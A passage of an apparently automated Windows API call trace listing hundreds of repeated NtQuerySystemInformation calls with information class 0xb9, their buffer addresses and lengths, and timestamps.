Length=0x0, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd950, Length=0x28, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd950, Length=0x28, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0271.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x20, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x20, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb18, Length=0x58, ResultLength=0x0) [0271.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x28, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd790, Length=0x20, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb18, Length=0x58, ResultLength=0x0) [0271.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x28, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x28, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0271.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 